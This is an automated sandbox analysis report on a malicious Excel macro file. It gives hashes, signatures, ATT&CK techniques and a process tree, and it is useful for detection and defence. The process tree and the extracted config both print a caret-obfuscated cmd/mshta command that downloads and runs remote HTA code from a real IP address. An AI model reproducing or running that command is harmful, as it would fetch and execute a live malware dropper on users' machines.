Analysis

  • max time kernel
    105s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20230621-en
  • resource tags

    arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
  • submitted
    05-07-2023 13:22

General

  • Target

    00ac480eb8e89d69c6f7ad4b7.xlsm

  • Size

    29KB

  • MD5

    3d646a89bba2a562b8a491fe0a4fff75

  • SHA1

    728641affd87d450fb3596ec61b4e912f4aa91cb

  • SHA256

    00ac480eb8e89d69c6f7ad4b701801d4834aa3d9afbade4f3bb6701be52d5336

  • SHA512

    c49826f64775a19a32a7d41f74f3af18d68a0d3b2b7900a3173f1671f6db80b651559e62165608dc662d31b0895829bd7cacf5db609880a8e215a7c26d53505c

  • SSDEEP

    768:hSTg3sx6feommUxjfC30+kS4QyoY0ckCam:hH3sx6JmXYk4pZcmm

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://87.251.85.100/love/love3.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\00ac480eb8e89d69c6f7ad4b7.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1572
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/love/love3.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://87.251.85.100/love/love3.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:280

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1572-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1572-66-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB